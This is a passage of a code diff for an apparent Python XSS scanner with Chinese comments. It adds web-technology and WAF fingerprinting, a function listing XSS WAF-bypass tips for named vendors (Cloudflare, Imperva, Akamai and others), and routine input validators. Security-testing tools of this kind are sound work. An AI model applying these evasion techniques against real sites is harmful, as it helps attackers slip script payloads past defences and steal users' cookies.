+        # 基于HTML的后端技术检测
+        if soup:
+            for tech, patterns in self.backend_technologies.items():
+                if tech in results['backend']:
+                    continue
+                    
+                for tag_name, attrs in patterns:
+                    if tag_name in ['link', 'a', 'form', 'input', 'meta', 'script', 'body']:
+                        elements = soup.find_all(tag_name, attrs)
+                        if elements:
+                            if tech not in results['backend']:
+                                results['backend'].append(tech)
+                                break
+        
+        # 检测服务器技术
+        for server, patterns in self.server_technologies.items():
+            for header_name, pattern in patterns:
+                if header_name in headers:
+                    if isinstance(pattern, re.Pattern) and pattern.search(headers[header_name]):
+                        if server not in results['server']:
+                            results['server'].append(server)
+                            break
+        
+        # 检测WAF
+        for waf, patterns in self.waf_technologies.items():
+            for header_name, pattern in patterns:
+                if header_name in headers:
+                    if isinstance(pattern, re.Pattern) and pattern.search(headers[header_name]):
+                        if waf not in results['waf']:
+                            results['waf'].append(waf)
+                            break
+                            
+        # 添加详细检测信息
+        self._enhance_detection(results, soup, headers)
+        
+        return results
+    
+    def _enhance_detection(self, results, soup, headers):
+        """
+        增强检测，添加更多详细信息
+        
+        Args:
+            results: 已检测的结果
+            soup: BeautifulSoup对象
+            headers: HTTP响应头
+        """
+        # 检测JavaScript库的版本
+        if soup:
+            # 检测React版本
+            if 'React' in results['frontend']:
+                script_tags = soup.find_all('script')
+                for script in script_tags:
+                    if script.string and 'React.version' in script.string:
+                        version_match = re.search(r'React.version\s*=\s*[\'"]([^\'"]+)[\'"]', script.string)
+                        if version_match:
+                            results['frontend'].remove('React')
+                            results['frontend'].append(f"React {version_match.group(1)}")
+                            break
+            
+            # 检测Angular版本
+            if 'Angular' in results['frontend']:
+                for script in soup.find_all('script'):
+                    if script.string and 'angular.version' in script.string:
+                        version_match = re.search(r'angular.version\s*=\s*\{[^\}]*full:\s*[\'"]([^\'"]+)[\'"]', script.string)
+                        if version_match:
+                            results['frontend'].remove('Angular')
+                            results['frontend'].append(f"Angular {version_match.group(1)}")
+                            break
+            
+            # WordPress版本
+            if 'WordPress' in results['backend']:
+                meta_tags = soup.find_all('meta', {'name': 'generator'})
+                for meta in meta_tags:
+                    content = meta.get('content', '')
+                    if 'WordPress' in content:
+                        version_match = re.search(r'WordPress\s*([0-9\.]+)', content)
+                        if version_match:
+                            results['backend'].remove('WordPress')
+                            results['backend'].append(f"WordPress {version_match.group(1)}")
+                            break
+        
+        # 检测服务器版本
+        if 'Server' in headers:
+            server_header = headers['Server']
+            
+            # Nginx版本
+            if 'Nginx' in results['server']:
+                version_match = re.search(r'nginx/([0-9\.]+)', server_header, re.I)
+                if version_match:
+                    results['server'].remove('Nginx')
+                    results['server'].append(f"Nginx {version_match.group(1)}")
+            
+            # Apache版本
+            elif 'Apache' in results['server']:
+                version_match = re.search(r'Apache/([0-9\.]+)', server_header, re.I)
+                if version_match:
+                    results['server'].remove('Apache')
+                    results['server'].append(f"Apache {version_match.group(1)}")
+    
+    def get_waf_bypass_techniques(self, detected_waf):
+        """
+        根据检测到的WAF，返回可能的绕过技术
+        
+        Args:
+            detected_waf: 检测到的WAF列表
+            
+        Returns:
+            dict: WAF绕过技术
+        """
+        bypass_techniques = {}
+        
+        for waf in detected_waf:
+            if waf == 'Cloudflare':
+                bypass_techniques['Cloudflare'] = [
+                    '使用不同的编码方式: HTML, URL, Unicode, Base64等',
+                    '利用换行符分割XSS Payload',
+                    '使用JavaScript事件处理程序的大小写混合形式',
+                    '使用不同的HTML标签（避免常见的如script, img, iframe）',
+                    '尝试使用较少被检测的事件如onmouseover, onerror, onwheel等'
+                ]
+            elif waf == 'ModSecurity':
+                bypass_techniques['ModSecurity'] = [
+                    '使用JavaScript事件处理程序的不同形式',
+                    '使用HTML实体编码',
+                    '分割Payload: < s c r i p t >',
+                    '使用JavaScript的eval函数和字符串操作函数',
+                    '使用CSS注入配合XSS'
+                ]
+            elif waf == 'Imperva':
+                bypass_techniques['Imperva'] = [
+                    '使用JavaScript原型链污染技术',
+                    '避免使用关键词(alert, document.cookie等)',
+                    '使用JavaScript的间接调用方法',
+                    '使用多层编码: URL编码 + HTML编码 + Unicode编码',
+                    '利用长字符串和重复字符迷惑WAF规则'
+                ]
+            elif waf == 'F5 BIG-IP':
+                bypass_techniques['F5 BIG-IP'] = [
+                    '使用非标准事件处理程序',
+                    'DOM XSS手法通常更能绕过F5的防护',
+                    '使用JavaScript模板字符串',
+                    '使用JavaScript的Function构造函数',
+                    '利用特定浏览器的解析差异'
+                ]
+            elif waf == 'Akamai':
+                bypass_techniques['Akamai'] = [
+                    '利用JavaScript的变量和函数名混淆',
+                    '使用CDATA和注释规避特征检测',
+                    '避免直接使用javascript:伪协议',
+                    '使用data:text/html;base64,...编码',
+                    '利用JavaScript中的字符串拼接和动态执行'
+                ]
+        
+        return bypass_techniques 
\ No newline at end of file
diff --git a/xss_scanner/utils/validator.py b/xss_scanner/utils/validator.py
new file mode 100644
index 0000000..24b9071
--- /dev/null
+++ b/xss_scanner/utils/validator.py
@@ -0,0 +1,228 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+参数验证模块，负责验证用户输入的参数
+"""
+
+import re
+import os
+import logging
+from urllib.parse import urlparse
+
+logger = logging.getLogger('xss_scanner')
+
+def validate_target(target):
+    """
+    验证目标URL是否有效
+    
+    Args:
+        target: 目标URL
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not target:
+        return False
+        
+    # 检查URL格式
+    if not target.startswith(('http://', 'https://')):
+        logger.warning(f"无效的URL格式: {target}，URL必须以http://或https://开头")
+        return False
+        
+    # 解析URL
+    try:
+        parsed_url = urlparse(target)
+        if not parsed_url.netloc:
+            logger.warning(f"无效的URL: {target}，缺少域名")
+            return False
+    except Exception as e:
+        logger.warning(f"URL解析失败: {target} - {str(e)}")
+        return False
+        
+    return True
+
+def validate_file_path(file_path, check_exists=True, check_write=False):
+    """
+    验证文件路径是否有效
+    
+    Args:
+        file_path: 文件路径
+        check_exists: 是否检查文件是否存在
+        check_write: 是否检查文件是否可写
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not file_path:
+        return False
+        
+    # 检查文件是否存在
+    if check_exists and not os.path.exists(file_path):
+        logger.warning(f"文件不存在: {file_path}")
+        return False
+        
+    # 检查文件是否可写
+    if check_write:
+        try:
+            # 检查文件是否可写
+            if os.path.exists(file_path):
+                if not os.access(file_path, os.W_OK):
+                    logger.warning(f"文件不可写: {file_path}")
+                    return False
+            else:
+                # 检查目录是否可写
+                dir_path = os.path.dirname(file_path)
+                if dir_path and not os.access(dir_path, os.W_OK):
+                    logger.warning(f"目录不可写: {dir_path}")
+                    return False
+        except Exception as e:
+            logger.warning(f"检查文件权限失败: {file_path} - {str(e)}")
+            return False
+            
+    return True
+
+def validate_ip(ip):
+    """
+    验证IP地址是否有效
+    
+    Args:
+        ip: IP地址
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not ip:
+        return False
+        
+    # IPv4正则表达式
+    ipv4_pattern = r'^(\d{1,3}\.){3}\d{1,3}$'
+    
+    # 检查格式
+    if not re.match(ipv4_pattern, ip):
+        return False
+        
+    # 检查每个段的范围
+    segments = ip.split('.')
+    for segment in segments:
+        if not 0 <= int(segment) <= 255:
+            return False
+            
+    return True
+
+def validate_port(port):
+    """
+    验证端口号是否有效
+    
+    Args:
+        port: 端口号
+        
+    Returns:
+        bool: 是否有效
+    """
+    try:
+        port = int(port)
+        return 1 <= port <= 65535
+    except:
+        return False
+
+def validate_proxy(proxy):
+    """
+    验证代理设置是否有效
+    
+    Args:
+        proxy: 代理设置
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not proxy:
+        return False
+        
+    # 检查代理格式
+    if not proxy.startswith(('http://', 'https://', 'socks4://', 'socks5://')):
+        logger.warning(f"无效的代理格式: {proxy}，代理必须以http://、https://、socks4://或socks5://开头")
+        return False
+        
+    # 解析代理
+    try:
+        parsed_proxy = urlparse(proxy)
+        if not parsed_proxy.netloc:
+            logger.warning(f"无效的代理: {proxy}，缺少主机名")
+            return False
+    except Exception as e:
+        logger.warning(f"代理解析失败: {proxy} - {str(e)}")
+        return False
+        
+    return True
+
+def validate_regex(pattern):
+    """
+    验证正则表达式是否有效
+    
+    Args:
+        pattern: 正则表达式
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not pattern:
+        return False
+        
+    try:
+        re.compile(pattern)
+        return True
+    except re.error:
+        return False
+
+def validate_headers(headers):
+    """
+    验证HTTP头是否有效
+    
+    Args:
+        headers: HTTP头，格式：Header1:Value1;Header2:Value2
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not headers:
+        return False
+        
+    try:
+        # 分割HTTP头
+        header_pairs = headers.split(';')
+        for header in header_pairs:
+            if header.strip() and ':' not in header:
+                logger.warning(f"无效的HTTP头格式: {header}，应为Header:Value格式")
+                return False
+                
+        return True
+    except Exception as e:
+        logger.warning(f"验证HTTP头失败: {str(e)}")
+        return False
+
+def validate_cookies(cookies):
+    """
+    验证Cookie是否有效
+    
+    Args:
+        cookies: Cookie，格式：name1=value1; name2=value2
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not cookies:
+        return False
+        
+    try:
+        # 分割Cookie
+        cookie_pairs = cookies.split(';')
+        for cookie in cookie_pairs:
+            if cookie.strip() and '=' not in cookie:
+                logger.warning(f"无效的Cookie格式: {cookie}，应为name=value格式")
+                return False
+                
+        return True
+    except Exception as e:
+        logger.warning(f"验证Cookie失败: {str(e)}")
+        return False 
\ No newline at end of file